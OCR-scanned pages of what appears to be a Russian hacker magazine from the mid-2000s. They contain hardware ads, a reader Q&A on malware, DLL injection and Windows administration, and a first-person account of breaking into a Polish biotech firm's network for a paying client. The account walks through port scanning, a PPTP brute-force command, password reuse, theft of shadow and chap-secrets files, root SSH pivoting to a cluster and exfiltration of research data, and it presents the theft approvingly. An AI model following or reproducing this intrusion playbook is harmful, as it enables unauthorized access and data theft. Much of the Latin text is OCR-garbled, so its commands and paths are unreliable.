160 тысяч 



человек. 
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Собственное производство высококачественной стали • Лицевые панели изготовлены в соответствии со стандартами ведущих мировых производителен 
Легендарные блоки питания Р5Р, НіРго, СѴѴТ • Сборка ПК без использования инструмента во всех моделях корпусов 
Дополнительные вентиляторы и ЫЗВ панели в базовой конфигурации • Более 100 моделей во всех ценовых категориях 
Широкий ассортимент вентиляторов для процессоров АМР и Іп*еІ 
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Чипсет Іпіеі 915РІ_; 

ЦЗА775 для ІпСеІ Репііит 4ЕЕ/Рге$сои СРІІ; 
Р5В800; Эиаі сЬаппеІ 0ЭК 400/333 х 2 ЭІММ5; 

1 х Р-АТА, 4 х 5 -АТА 1 50 (РАЮ 0, 1 , 0+1 ); 

Аисііо 7.1; СЬЕ І-АИ; ІЕЕЕ 1394а; 
до 8 портов 115В 2.0; 

1 х РСІе х 16, 1 хРСІехІ, 3 х РСІ, 1 х РСЕ 8Х; 
Рохсопп Р.С.Е. 8Х совместим с АСР 8Х, 
поддержка 2х мониторов 
(ѴѴіпсіоѵуб 2000/ХР) и МісгобоП: РігесІХ 9.0. 



Чипсет пѴЮІА ИР4 ІІИга; 

Боскеі 939 для АМР АИЫоп™ 64/64РХ СРІІ; 

Р5В 2000 МТ/5, НурегТгапБрогТ™; 

до 4СВ Оиаі сЬаппеІ ООК400/ООКЗЗЗ/ООК266; 

1 хРСІеХІб, 2 х РСІе XI, 4 х РСІ; 

4 х Бегіаі АТА II (КАЮ 0, 1, 0+1); 

Аисііо 7.1, АС97; СЬЕ ЬАЫ, ІЕЕЕ 1394а; 
до 8 портов 115В 2.0 



Чипсет ІпСеІ 955Х; поддержка Оиаі Соге СРСІ; 
Р5В 1066/800 МНі; 

Оиаі сЬаппеІ ООК2 533/667 х4 ОІММз ѵѵітН ЕСС; 
Р-АТА х 3, 5- АТАМ х 4, 5- АТА х 4; 

РСІехІб, ЗхРСІех I; 

7.1 сНаппеІ, НАй; 

Оиаі Вгоасісот СЬЕ І_АЫ; 

ІЕЕЕ 1 394Ь & 1394а (Ріге ѴѴіге); 
до 8 портов СІ5В 2.0 



Москва: Ргопеідгоир - (095) 789-3846; Шга Сотриіегз - (095) 775-7566; Инкотрейд - (095) 785-8659; Кит - (095) 777-6655; Компьютадор - (095) 274-7300; НИКС - (095) 974-3333; Полярис - (095) 755-5557; Альметьевск: Компьютерный мир - (8553) 25-38-29; 
Волгоград: ЮКК МТ - (8442) 49-19-20; Краснодар: Игрек - (8612) 210-98-50; Красноярск: КАПИТАЛ-СЕРВИС - (3912) 63-60-30; Курск: КомпьюЛэнд - (0712) 56-46-43; Курчатов: КомпьюЛэнд - (07131) 2-31-22; Липецк: Регард - (0742) 22-13-09; 
Набережные Челны: КЦ "Ыехі сотриіег" - (8552) 39-03-38; Нижнекамск: КЦ "ІМехІ сотриіег" - (8555) 43-79-82; Нижний Новгород: АйТиОн - (8312) 74-85-90; ВИСТ-НН 000 - (8312) 78-48-78; Ником-Медиа (8312) 34-11-34; ЮСТ - (8312) 30-16-74; 
Новосибирск: ЗЕТ ИСК - (3832) 125-142; Новый Уренгой: Все для офиса - (34949) 5-55-55; Омск: ТНТ 000 - (3812) 36-82-42; Электронный рай - (3812) 51-04-04; Рязянь: Шга - (0912) 205-205; Самара: Прагма - (8462) 16-32-87; 
Саратов: АТТО - (8452) 444-111; Томск: Стек - (3822) 554-554; Хабаровск: Диалог Плюс - (4212) 50-37-06; Дальком - (4212) - 42-86-72; Челябинск: Алиас - (3512) 37-8717; Чита: Вавилон - (3022) 32-55-00. 
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БУДЬ КОНКРЕТНЫМ И ЗАДАВАЙ КОНКРЕТНЫЕ 
ВОПРОСЫ! СТАРАЙСЯ ОФОРМИТЬ СВОЮ 
ПРОБЛЕМУ ТАК, ЧТОБЫ Я СМОГ ДЕЙСТВИ- 
ТЕЛЬНО ПОМОЧЬ ТЕБЕ СОВЕТОМ, УКАЗАТЬ 
НА ВОЗМОЖНЫЕ ОШИБКИ. ОСТЕРЕГАЙСЯ ОБ- 
ЩИХ ВОПРОСОВ ВРОДЕ «КАК ВЗЛОМАТЬ ИН- 
ТЕРНЕТ?», ТЫ ЛИШЬ ПОТРАТИШЬ СВОЙ ПОЧ- 
ТОВЫЙ ТРАФИК. ТРЯСТИ ИЗ МЕНЯ ФРИШКИ 
(ИНЕТ, ШЕЛЛЫ, КАРТЫ) — НЕ СТОИТ, Я САМ 
ЖИВУ НА ГУМАНИТАРНУЮ ПОМОЩЬ! 




РАОСОММЕЫТЗ 

ЗісІеХ 

(Ііаск-?ад@геаІ.хакер.ги) 



Щ Неужели Майкл Джексон пал так низко, что стал 
распространять свой именной вирус? 

Ж! Не совсем ясно, какого рода вирус могла распро- 
странять звезда попы и других влекущих частей отбе- 
ленного тела :). На самом деле, некие темные личнос- 
ти вырастили червячка Заско Зиісісіе. Этот шедевр ви- 
русописательства приходил вместе с письмом о со- 
вершенном Майклом самоубийстве. Понятно, что это 
было дезинформацией с линком на сайт, посетив кото- 
рый, жертва успешно подцепляла троянского коня се- 
мейства Тгоі/ВогоЬТ-Ѳеп, который вписывался в компь- 
ютерную конюшню через дыру ІЕ. После успешного за- 
ражения, зверь вырывался в Сеть, чтобы присоеди- 
ниться к ботнету своих собратьев. Как водится, тамош- 
нее стадо использовалось для проведения ЭЭоЗ-атак. 
Светлый образ Майкла пришелся вирмейкерам по 
вкусу не впервые: в 2004 они распространяли заразу 
под видом непристойного видео о звезде. Какое жес- 
токое время! Помни, не только приглашение на ранчо 
Майкла опасно для твоих ягодиц, но и даже инфа о нем 
может создать проблемы твоему железному другу. 

Щ Кевин Митник, да Кевин Митник. А кто такой его тез- 
ка — Роиізеп? 

Ж! Оба нашли место в почетном Наскегз НаІІ о^ Рате, 
оба засветились на хакерской сцене. Поулсен преус- 
пел минуткой раньше, когда в 1990 выиграл Порш 944, 
путем махинации в проводимой лотерее. Дядя сумел 
разобрать всю телефонную сетку Лос-Анджелеса да- 
бы стать 102 дозвонившемся на радио-станцию. Опи- 
сание известных и неизвестных подвигов легендарного 
Поулсена может занять много журнального места, да и 
рубрика Сцена уже вспоминала его неоднократно. 
Здесь замечу, что герой попалился на атаке против се- 
ти ФБР, когда там разыскивалась инфа по секретным 
агентам спецслужбы. Подробную биографию данной 
занимательной личности можно добыть на Шр://іІс.сІіз- 
соѵегу. сот/сопѵегдепсе/Ііаскег5/Ііаскег5.ІіітІ. 

Щ Какой самый большой тюремный срок давали хакеру? 

Ж! Более других Америка продвинулась в подготовке 
агрессивной законодательной базы для осуждения 



хакеров. Самой хитовой статьей становится Сотриіег 
РгаисІ & АЬизе Асі, который может отправить хакера в 
20-летний тюремный отпуск. Столь жесткого наказа- 
ния пока не заслужил ни один счастливчик, но 9-лет- 
ние турне уже было выписано. Сейчас ведется разра- 
ботка хакерской бригады ЗГюбомСгем (там, по слу- 
хам, состоит/состояло аж 4000 бойцов международ- 
ного фронта). Главным активистам виртуальной брига- 
ды грозят сроки на любой вкус — от 5 до 10 лет. 

С|1 Мониторю несколько виндозных серверов и уже 
умотался собирать отовсюду логи. Можно ли как-то 
выгребать их автоматически и складывать стопочкой 
на одну из машин? 

Ж! Безусловно, мы можем потратить часы на настрой- 
ку подручных средств Винды, чтобы научить неграмот- 
ную всей камасутре страстного администрирования. 
Однако есть способ получше — готовое решение Зузіод 
Эаетоп (\ллллл/. кЫзузІод, сот) . Помимо работы на \л/іп- 
пространстве, прога умеет соскребать логи с роуте- 
ров, свитчей, *піх-машин. В программу интегрирован 
грамотный парсер, который поможет отфильтровать все 
логи, оставляя лишь самое необходимое. Тема может 
собирать все логи в кучу или сбрасывать инфу в отдель- 
ное окошко под каждую систему. Помимо немого опо- 
вещения, прога умеет оперативно реагировать на объ- 
являющиеся проблемы — запуском нужного софта. 

Щ Что скрывается за понятием ОБЫгуесТюп? Как реа- 
лизовать этот прием? 

Ж! Это явление было впервые освещено в книге Мэт- 
та Пиетрека «Секреты ѴѴіпсІо\л/$ 95». Из столь антиквар- 
ной системы этот трюк успешно мигрировал в более 
современные системы. 

Под ОП-іпіесііоп понимается внедрение сторонней 
библиотеки в выполняемый процесс при помощи мо- 
дификации таблицы импорта. На самом деле, такую 
подставу можно легко обнаружить при помощи сов- 
ременных антивирусов, или программ вроде РЕ-ТооІз. 
Почитать более подробно об этом и посмотреть ра- 
ботающие примеры можно здесь: и/и/и/, и /азт.ги/агіі- 
сіе .ріір ?агіісІе=оріІі оок_2. 





09 Можно ли подменить код через функцию отладки? 

А! Конечно, существует добротный, но довольно медленный спо- 
соб — использования функций дебага для проведения желанного 
ігуесі'а. Знакомой функцией СгеаіеРгосеззО рождается процесс с 
пометкой ОЕВІІ0_РРОСЕ35. После серии стандартных манипуля- 
ций, о которых ты можешь прочитать в сети (Ѳоодіе: «перехват функ- 
ций»), мы переключаемся на обработку ЕРІ-регистра. Здесь нам 
потребуется получить значение регистра, что будет сделано неза- 
медлительно через ѲеіТІпгеасІСопіехЮ. Заполучив инфу о положе- 
нии вещей, начинаем подмену через 5еіТНгеасІСопіехі(), После 
проведения необходимых злостных действий, оригинальный код 
восстанавливается через все ту же функцию 5еіТІігеасІСопіехі(). 
Для наглядности рекомендую сдуть файлик Ігуесіо_5гс.2ір, который 
можно без труда отыскать на просторах инета. 

09 Расскажи про модную Собе Зедиепсе Ібепіііісаііоп технологию! 

А! Занятно, что довольно малоизвестную находку обзывают 
«модной» :). На самом деле, данное СЗІ-решение принадлежит 
творцам Аб-А\л/аге ( Іаѵазойиза.сот/зойѵѵаге/асіаѵѵаге ). Доволь- 
но простой эвристический анализатор помогает предупредить 
распространение модификаций уже известной рекламной зара- 
зы (аб\л/аге). Мне сложно судить насколько тема эффективна на 
поле реальных боевых действий, но зная о недалекости большин- 
ства таі-кодеров, простые «под копирку» сдутые клоны можно 
легко выцепить и обезвредить с помощью «модной» хрени. 

09 Как мне подтереть все пароли, сохраненные в ІЕ? Можно ли 
отучить гляделку от запоминания моих секретов? 

Аі Все получается элементарно. Мы просто бредем в Тооіз- 
>Іпіегпеі Орііоп5->Сопіепі->АиіоСотрІеіе->СІеаг Раззмогсіз. Для 
отучения памяти ІЕ от излишней прозорливости, снимаем галку в 
ІІзе АиіоСотрІеіе іог ->11зег патез апб раззмогсіз оп іогт$. 

09 Как запретить конкретному юзеру использование командной 
строки в пространстве ѴѴіпХР? 

Аі Здесь существует несколько способов разумного ограниче- 
ния. Если тебя интересует отдельный юзер, то ты просто чешешь в 
направлении НКЕУ_и5ЕР5\(изег5ісІ)\5оіі\л/аге\РоІісіе5\Місго50Іі 
\\А/іпбо\л/5\5узіепп. Там выискивается 'ОізаЫеСМО 1 , которое сле- 
дует перевести в Т. Если же тебе нужно ограничить целую группу, 
к которой принадлежит отдельный юзер, в действие вступает ІІзег 
СопіідигаііопХАсІтіпізігаііѵе ТетрІаіез\5узіепп\Ргеѵепі ассезз іо 
іНе соттапб рготрі. За более детальными разъяснениями обо- 
их способов двигаемся в Сеть, необходимую доку можно качнуть 
на Іііір:// ѵѵѵѵѵѵ. т іеговой. сот/гезоигсез/сІоситепіаііоп/ѴѴіпсІоѵѵз 
/2000/зегѵе г/ге зкі і/еп- из/ОеІаиІТ. озр ? игІ=/гезо иге ез/сіо си теп іо- 
ііоп/\Л/іпсІоѵѵз/2000/зегѵег/гезкіі/еп-из/гедепігу/93465. азр. Есть и 
чуть менее элегантный способ. Тебе нужно лишь отыскать файл 
стсі.ехе, чтобы запретить к нему доступ для конкретного юзвера. 
Правой кнопкой мыши ты выбираешь $есигііу->Добавляешь огра- 
ничиваемого юзера->поднимаешь флаг «Оепу (Ехесиіе)», запре- 
тив запуск файла командной строки. 

09 Можно ли перекрыть доступ к стсі.ехе, просто переименовав его? 

Аі Перестанет ли Винда быть глюкавой, если ее назвать не «Окна- 
ми», а «Дверьми»? Маловероятно. Так и здесь, движение окажется 
мало полезным. Просто пользователь не сможет запустить интерп- 
ретатор при помощи знакомой иконки в меню «Пуск». Однако, тот 
же самый юзер, при минимальном желании воспользоваться моз- 
гом, получит-таки доступ к необходимому бинарнику, причем без 
особых подвигов. Нужно будет лишь перебрать исполняемые фай- 



лы в %8у5іетРооі\8узіет32, где один обязательно окажется пере- 
именованным стсі.ехе. Так что подобный ход не похож на разум- 
ное решение. Кроме того, этот способ может принести неприят- 
ные моменты в повседневное использование винды. Переимено- 
вание или удаление стсі.ехе не принесет какого-либо успеха, ес- 
ли включена ѴѴіпсІомз Еііе Ргоіесііоп, которая не позволяет модифи- 
цировать стандартные файлы системы. О том, какие проблемы су- 
лит удаление/переименование стандартных бинарников, ты мо- 
жешь прочитать в МЗЭЫ библиотеке Місгозоіі, разделе о ѴѴЕР. 

СИ Работники любят засиживаться после работы в админной сетке, 
чтобы повтыкать на порнуху. Начальство требует их отучать от этого, так 
что скажи, как мне автоматически вырубать все компы после 18:00? 

Аі На самом деле, подобные меры очень непопулярны и на мо- 
ей памяти есть админ, которому борьба за уменьшение порно- 
трафика стоила работы :). Однако рабочее рукоблудие можно 
победить простой программой аі.ехе, через которую можно бу- 
дет вбить запрос на отключение в любое нужное время. Строка 
«АТ \\сотриіегпате 18:00 /ЕѴЕРѴ:т,і,\л/,іИ,і,$,$и "зНиісІомп -з"» зас- 
тавит выключаться выбранные компы сразу с окончанием рабоче- 
го дня. Можно также обойтись без АТ, залив на сервер «зНиісІо\л/п 
-з -і -т \\СотриіегМате -і 60 -с "Быстро все сохрани, а то я выру- 
баюсь через 60 сек!". Понятно, что ты можешь быть повежливее и 
даже прибавить секунд на «сбор теплых вещей». 

СИ Каким-то образом потер іехріоге.ехе, не могу по инету лазать! Как ре- 
шить проблему, чтобы не пришлось бежать в суппорт к злым сад/іинам? 

Аі Вероятно, мы имеем дело с юзерским доступом к системе. 
Забывая о неправдоподобности возможности удаления файла 
юзером, предложу самый простой, но элегантный способ. Отк- 
рыв любое окно винды, ты сможешь легко использовать его для 
серфинга. Там можно вместо знакомого «С:\» вбить ѵѵѵѵѵѵ. хокер.ги, 
чтобы вырваться в царство королей андеграунда :). 

111 Как можно отрубать аккаунты юзеров, которые были неактив- 
ны целый месяц на моем ѴѴіп2К Асіѵ.зегѵег? 

Аі В желании реализовать подобное есть разумное зерно. Заду- 
манное можно легко реализовать при помощи простого скрипта. Об- 
разец можно сдуть с ѵѵѵѵѵѵ.зегѵегѵѵаісіі.сот, я лишь поясню ключевые 
моменты предложенного там решения, которое окажется универ- 
сальным. Зеі ѲгоирОЬі = ѲеЮЬ]есі("\Л/іпМТ://МУООМАІМСОМТРОЕ- 
І_ЕР/ІІзегз") натравит скрипт на конкретную машину. Здесь же можно 
вписать контроллер домена. Іі Оііі >= 6 ТПеп ЕІадз = ІІзегОЬі. 
ОеіС'ІІзегЕІадз") поможет установить количество недель, по прошест- 
вии которых, будет произведена отключка юзера или домена. 

09 Хочу быть уверен в том, что все системы ІЧТ-сети вовремя были 
обновлены. Что делать? 

Аі Решений будет два: прямое и для настоящих героев — в обход. В 
первом случае ты можешь с комфортом изучить специальный лог 
%5узТетВоо1%\Ѵ\/іпсІоѵѵз ІІрсІаТе.Іод, где разыщется дата последнего 
апдейта системы. Не буду объяснять, как собирать логи с нескольких 
систем, так как об этом уже шла речь (Зузіод Оаетоп). Можно соору- 
дить контрольный лист со списком самых последних апдейтов, так что 
он будет сверяться с текущим содержанием подопечных систем. По 
пути к \НКЕУ_ЮСАЕ_МАСНІМЕ\50ЕТ\А/АРЕ\Місго50Іі\\А/іпсІо\л/5МТ\Сиг- 
гепіѴегзіоп\Ноіііх\$КВІ\!ІІМВЕР будет номер последнего хотфикса 
(Кпо\л/ІесІдеВа5е-записи). Хакерский, то есть путь самурая, потребует 
установки софтины Разсо с ѵѵѵѵѵѵйоипсІзТопе.сот, которая, прочитав 
файл іпбех.сіаі из СЛОоситепіз апсі ЗеіііпдзХрспатеХІІзеЮаіа, ска- 
жет, когда последний раз ты залетал на сайт Місгозоіі ІІрбаіе © 
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ЮНИТЫ КРЕАТИФФ КОДИНГ ЦМІХОІР СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20ЫЕ ГЕВРЯІМ НЬЮСЫ 



История взлома 
распределенной сети 
научной лаборатории 

[опять ночь, опять работа] Поздней ночью, когда я уже собирался 
спать, в мою ІСО постучался знакомый. Он хотел сосватать мне 
своего проверенного человечка, мол, того интересует тема взло- 
ма. Я сперва подумал, что это какой-нибудь очередной работник 
внутренних органов, но, по словам товарища, мне предстояло 
иметь дело с уважаемым ученым из Российской академии наук, 
специалистом по генным исследованиям. Он хотел, чтобы я помог 
одной польской биологической компании поделиться с ним сво- 
ими наработками ;). Пообещав крупную сумму денег, он скинул 
мне адрес и попросил дать ответ на следующий день. 





Внедрение в кластер 



ШИРОКОПОЛОСНЫЙ ДОСТУП В ИНТЕРНЕТ 
СТРЕМИТЕЛЬНО ДЕШЕВЕЕТ. ВСЕ ЧАЩЕ И ЧА- 
ЩЕ ЛЮДИ СПРАШИВАЮТ МЕНЯ: «КАК СДЕЛАТЬ 
ТАК, ЧТОБЫ НЕСКОЛЬКО КОМПЬЮТЕРОВ В 
ЛОКАЛКЕ МОГЛИ РАБОТАТЬ В ИНЕТЕ ЧЕРЕЗ 
ОДНО ПОДКЛЮЧЕНИЕ?». РЕШИТЬ ЭТУ ПРО- 
БЛЕМУ ЧРЕЗВЫЧАЙНО ПРОСТО, НЕ ОБЛАДАЯ 
ПРИ ЭТОМ ГЛУБОКИМИ ПОЗНАНИЯМИ В АДМИ- 
НИСТРИРОВАНИИ. ДАЖЕ В ѴѴІШОѴѴЗ ХР ИМЕ- 
ЮТСЯ ВСЕ НЕОБХОДИМЫЕ СРЕДСТВА ДЛЯ ОР- 
ГАНИЗАЦИИ ШЛЮЗА МЕЖДУ ВНУТРЕННЕЙ 
И ВНЕШНЕЙ ГЛОБАЛЬНОЙ СЕТЬЮ I Степан Ильин ака 
31-ер ($Тер@геаІ. хакер. ш) 



Работать я начал по стандартному сценарию — зацепил чистый прок- 
сик в браузер и полез на главный сайт компании ѵѵтѵ.Ь/о/л/о.р/. Ска- 
нирование на предмет бажных скриптов к нужному результату не при- 
вело, ручной и автоматизированный (с помощью Ооодіе) поиск также 
не дал ничего хорошего. Промаявшись целый час, я так и не сдвинул- 
ся с места. Нужно было изменить стратегию взлома, и я решил прос- 
канировать порты на этой машине и во всей подсети. 

Сканил я, как обычно, Ытар'ом. Может быть, когда-то мне и нра- 
вились удобства виндового І_апОиагсІ Зсаппег, но теперь я цели- 
ком и полностью перешел в консоль. Действительно, только 
І\Ітар может безопасно для хакера просканировать нужную 
сеть и показать все баннеры сервисов. 

Первое сканирование я осуществил с набором опций -зЗ -о 
зсап.Іод, чтобы просто ознакомиться с сетевой картиной в инте- 
ресующей подсети. Спустя десять минут после старта, сканер 
записал в лог сведения обо всех живых машинах. В момент скана 
их было 12, и большинство управлялось двухтысячной виндой. По- 
нятное дело, что меня интересовал только Ппих, все \Л/іпсІо\л/5-ма- 
шины, наверняка, были простыми рабочими станциями. 

После анализа лога я понял, что на главном \ЛЛЛЛЛ/-сервере нару- 
жу открыты следующие порты: 53, 79, 80, 3128 и 1723. За фильтром 
же находились 21, 22, 25, 110 и 3306. По-видимому, на сервере 
крутился не только АрасОе, но и ряд других важных сервисов, ко- 
торые мне предстояло поломать :). 

[посягательство на локальную сеть] В надежде, что администра- 
тор сети лопух, я попытался приконнектиться к порту 3128 с запро- 
сом на сторонний ресурс. Однако тут же был послан с ошибкой 
403. Это означало, что сисадмин все-таки позаботился о наст- 
ройке проксика и грамотно прописал права по ІР-адресам. 
Затем я захотел проверить, что скрывается за портом 79. По РРС 
за этой цифрой прикреплен Ипдег-сервис, то есть любой желаю- 
щий может проверить наличие юзера на линии. И действительно, 
стоило мне зателнетиться на порт, как я получил табличку, состо- 
ящую всего из одной строки: 




[объект для взлома] 
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[быстрый процесс сканирования сети] 



[запуск брутфорса для РРТР] 




Апбггеік різ/0 абт-Ііоте.ЬіоіпІо 9:41 АМ -. 

Она означала, что в системе присутствует 
какой-то пользователь — по-видимому, ад- 
министратор. Причем не факт, что юзер за- 
логинился в консоли, он мог войти в сеть че- 
рез ѴРЫ-соединение. Иначе зачем было отк- 
рывать на сервере порт 1723, который, как 
известно, закреплен за службой ѴРІ\І РРТР. 
Взлом ѴРІЧ можно осуществить как мини- 
мум двумя способами. Либо МііМ'ом (Мап- 
іп-іНе-МісІсІІе), когда хакеру необходимо 
перехватить трафик между двумя компью- 
терами и представиться доверенным уз- 
лом каждому из них (с последующим пе- 
рехватом соединения, разумеется). Либо 
перебором пароля к уже известному логи- 
ну. В моем случае второй вариант предпоч- 
тительнее, потому как для осуществления 
МііМ -атаки мне потребовалось бы взло- 
мать компьютер, находящийся в одной под- 
сети с главным сервером. 

На самом деле подобрать РРТР-аккаунт не 
очень сложно. Мир не без добрых людей, 
поэтому в интернете полно брутфорсов 
практически для всех сетевых сервисов. Са- 
мый лучший переборщик для ѴРІ\] называет- 
ся ТНС-ррір-Ьгиіег ( Іііір://ТІіс.огд/сІоѵѵп - 
ІоасІ.рІір?1'=г&ЫІіс-ррТр-ЬгиТег-0. 1.4. іаг.ді). 
Как ты догадался, написан он немецкой хак- 
группой ТНС. Я уже испытывал его, и работа 
его мне очень понравилась. Перед запус- 
ком мне надо было определиться с именем 
пользователя и предполагаемым паролем. 
Судя по ответу Ипдег-сервиса, логин очень 
походил на какое-то польское слово. Поэто- 
му логичнее всего было использовать польс- 
кий словарь для перебора. Один такой, 
средней тяжести, нашелся по ссылке 
Пр://Пр. ох. ос. ик/риіэ/ѵѵогсііізіз/роіізіі/ѵѵогсіз. 
роіізкі.2, откуда я и слил его на боевой шелл. За- 
тем я запустил брутер следующей командой: 



ошибок. Если ты еще не догадался, то объясняю: опция -п означает число потоков, порож- 
даемых брутером. Сотня — самый оптимальный вариант. 

Мне очень повезло — уже через час брутфорс сообщил, что подобрал пароль на РРТР. 
Это было слово ксігозіе. Не медля ни минуты, я зашел на карженный виндовый сервер и 
создал новое ѴРЫ-соединение без перенаправления трафика через него. Коннект был 
удачным, и в статистике ѴРІ\І-соединения я увидел локальный адрес 192.168.30.34. 

[первые потери] В эту минуту я подумал о том, что мои действия слегка ошибочны. 
Во-первых, я совсем забыл, что в Польше в данный момент почти полдень, а во-вторых — 
я только что невольно завершил ѴРІ\І-сессию администратора. Короче, действовать мне 
надо было как можно быстрее. Запустив портированный виндовый птар, я просканиро- 
вал локальную сеть 102.168.30.0/24 и нащупал 42 машины. Самая первая из них выступа- 
ла в роли шлюза и, по-видимому, была тем же самым сервером Ьіоіпію.рі, но только с 
внутренней стороны. В локалке ни один порт не фильтровался, поэтому я без проблем 
мог обратиться к машине по РТР или ЗЗН-протоколу. 

Первое, что я сделал, — попробовал залогиниться на 22 порт под аккаунтом апсіггеіісксігозіе и, 
конечно же, оказался в консоли. Действительно, зачем держать несколько паролей на разные 
ресурсы? Можно воспользоваться одним, что и было сделано польским администратором :). 

В консоли \ЛЛЛЛЛ/-сервера не было ничего интересного. Собственно, я и не надеялся уви- 
деть в его каталогах что-то шокирующее и приватное — мало кто решится хранить генные 
исследования на внешнем сервере. Пока что я скопировал на свой компьютер файл 
/еТс/раззѵѵсІ — так, на всякий случай :). Затем мне очень захотелось посмотреть базу 
ѴРЫ-пользователей. Никаким габіиз-сервером здесь и не пахло, на Ппих-серваке распо- 
лагался обычный ррірб с ррр'шной базой в /еТс/ррр/скюр-зесгеТз. Только вот эта самая 
база была недоступна обычному пользователю, то есть прав на ее чтение у меня не бы- 
ло. Брать рута на этой машине тоже было сложно — сервер находился под контролем 
свежей РебПаі 9.0, для которой в паблике сплойтов не было. 

Быстренько прошвырнувшись по папкам, я нашел второй НЭЭ, который был подмонти- 
рован в /тпі/Ьоскир. «Бэкапы — это хорошо!» — подумал я и направился в этот ката- 
лог. А там я увидел то, что раз от раза вижу на большинстве крупных серверов: в корне 
раздела лежали большие архивы с именами еіс-баіе. іаг.ді, По те -ба Ію. іаг.ді, 
ѵ\лллл/=сІаіе. іаг.ді и т.п. На первый взгляд ничего удивительного, однако права доступа 
на все файлы были равными 644! Действительно, если просто создавать іаг-архив, сис- 
тема сожмет данные и совсем не позаботится о полномочиях. После распаковки ар- 
хива все права на документы и каталоги, конечно, будут соблюдены, но ведь мне ниче- 
го не мешает перекачать архив к себе на компьютер и рассмотреть его там. Так я и 
сделал. Воспользовавшись консольной утилитой зср, я быстро слил архив-бэкап ката- 
лога /еіс. Он весил всего 500 Кб, так что много времени у меня это не заняло. Но стои- 
ло мне залезть в скачанный архив, как ѴРІ\І-соединение пропало. Сначала я подумал, 
что мой провайдер немного глючит, однако попытка повторного входа успехом не 
увенчалась. Мало того, администратор занес адрес моего дедика в файрвол, благо- 
даря чему я потерял доступ к внешней и внутренней сетям компании. 



.ЛІіс-ррІр-ЬгіЛег -и апсіггеік -ѵѵ рі.ѵѵогсіз -п 
100 Ьіоіггіо.рІ. 

Переборщик сообщил, что коннект прои- 
зошел успешно и перебор начался без 



[удар по кластеру] Но я и не думал расстраиваться, ведь архив был успешно пере- 
несен на мою машину. Как я и ожидал, все логины и пароли на ѴРІ\І были прописаны 
в файле /еіс/ррр/сііор-зесгеі'з. Кроме этого, мне удалось скоммуниздить важный 
файл /еіс/зііосіоѵѵ, что открывало безграничные возможности. В базе РРТР я насчитал 
20 пользователей, чьи имена в большинстве своем совпадали с системными. Остава- 
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[словари на любой вкус!] 



лось лишь составить словарик из слов в /еТс/ррр/сІіар-зесгеТз 
и прогнать по нему все пароли в зГіасІом. Эта пустяковая задач- 
ка была решена, и через пять минут у меня на руках был руто- 
вый пароль к серверу. Как оказалось, он совпадал с пассвор- 
дом одного из администраторов сервера (всего их было три). 
Дождавшись глубокой польской ночи, я посмотрел статистику 
сервиса Ипдег и не увидел там ни одного активного пользователя. 
Настала пора действовать! Снова зацепившись по ѴРІ\І, я зашел 
на сервер под вторым администратором. Затем успешно засуи- 
дился на рута и таким образом поимел максимальные привиле- 
гии. Но меня не интересовал \ЛЛЛЛЛ/-сервер, мне нужно было ка- 
ким-то образом проникнуть в кластер компании и стащить оттуда 
генные расчеты. Сначала я думал, что совершить двойную атаку 
очень сложно и у меня не получится быстро попасть на локальные 
машины без установки сниферов, ядерных модулей и тому подоб- 
ного, но все оказалось проще, чем я ожидал. После быстрого 
просмотра файла /гооі/.ЬазІі_Ііі5іогу я нашел там... нет, не руто- 
вый пароль на кластер, как ты, наверное, подумал, а всего лишь 
команду /изг/сІизТег/Ып/тазз-стсІ геЬооі. Обратившись к этому 
файлу, я понял, что это специальный РегІ-скрипт, выполняющий ко- 
манду на всех кластерных станциях. Причем выполнял он ее весь- 
ма своеобразно: 

[код скрипта тазз-стсі] 

#!/изг/Ьіп/регІ 

іГ(!@АПОѴ){ 

сПе"изаде: $0 сІизіеГ-СоттапсЛп";} 

Ьг(ту $а=2;$а<=16;$а++){ 

ргіпі ,І \п192.168.30.$а:\п"; 

зузіет "ззіі 192.168.30.$а @АВОѴ\п"; 

} 

ргіпі 'ѴГ; 

Как видишь, сценарий просто входит на каждую станцию в се- 
ти и выполняет там заданную инструкцию. Вход без пароля 
можно осуществить только с помощью ключей, которые на- 
ходятся... правильно, в каталоге /гооТ/.ззіі. Набрав команду 
55 Іп 192.168.30.2, я сразу попал в консоль одного из узлов 
кластера. А выполнив запрос сК -0, я увидел сетевой диск, 
смонтированный в /изг/Ыо. Именно там находились все прог- 
раммы и генные таблицы. Так как я в этом деле мало что по- 
нимаю, мне пришлось сжать информацию в один большой 
архив и вытянуть его сначала на ѴѴѴѴѴѴ-, а затем и на каржен- 
ный сервер. Сливал данные я частями: вначале утащил таб- 
лицы, а затем софт, который распределенно считает соеди- 
нения по каким-то формулам. Увидев пару архивов, заказчик 
очень обрадовался, попросил меня стянуть остальную инфу 
и для стимула наградил авансом :). 

Спустя два часа я слил все, что можно было скачать: бэкап розі- 
дгезді-базы (я случайно ее нашел в каталоге /гооі), весь софт для 
распределенных вычислений как для ѴѴіпсІомз, так и для Ппих, ку- 
чу служебной документации, а также какие-то таблицы с генными 
соединениями. Все это добро я аккуратно выложил на буржуйс- 
кий фтп и дал ссылку заказчику. 

На следующий день клиент полностью оплатил мою работу. 
Он остался очень доволен той инфой, которую я ему подб- 
росил, и сказал, что она пригодится в его дальнейших ис- 
следовательских работах. 

[а что дальше?] Я договорился с человеком, что буду снабжать 
его свежими данными с кластера (не за спасибо, разумеется), 
но буквально на следующий день поляки закрыли порт 1723 для 
внешних сетей. По-видимому, они каким-то образом догадались 
об утечке и позаботились о своей безопасности. Я потерял дос- 
туп к их ресурсам, хотя и владел полной базой логинов и паролей. 
Но я не отчаивался, ведь при необходимости можно найти и дру- 
гую дырку в этой замечательной польской подсети :) 0 



[ЧТО ПОМОГЛО МНЕ ПРИ ВЗЛОМЕ?] 

Ш Я правильно сделал, что просканировал всю под- 
сеть на открытые порты. Удача мне улыбнулась, и я 
нащупал открытые 79 и 1723. Что было дальше, тебе 
уже известно :). 

Ш Я знал, что админы никогда не будут хранить важ- 
ные данные на ѴѴѴѴѴѴ-сервере (я говорю о правильных 
администраторах), поэтому искал лазейку в локальную 
сеть. И нашел ее — это был кластер. 

® Для попадания в кластер должен был существовать 
простой путь. Его я обнаружил в каталоге /гооі/.88іі, 
авторизация проводилась по ВЗА-ключу. 



[О ПРОЕКТАХ ТНС] 

ТНС-РРТР-ВпЛег не единственная программа, 
придуманная хакерской группой ТНС. Ребята из этой 
команды написали кучу полезных программ. Я хочу 
рассказать об избранных проектах, с которыми ты 
обязательно должен ознакомиться: 

Ш ТНС-Нубга (ѵ4.6) — великий и могучий брутфорс, 
который уже не раз описывался на страницах этого 
журнала. Он умеет подбирать пароли ко многим 
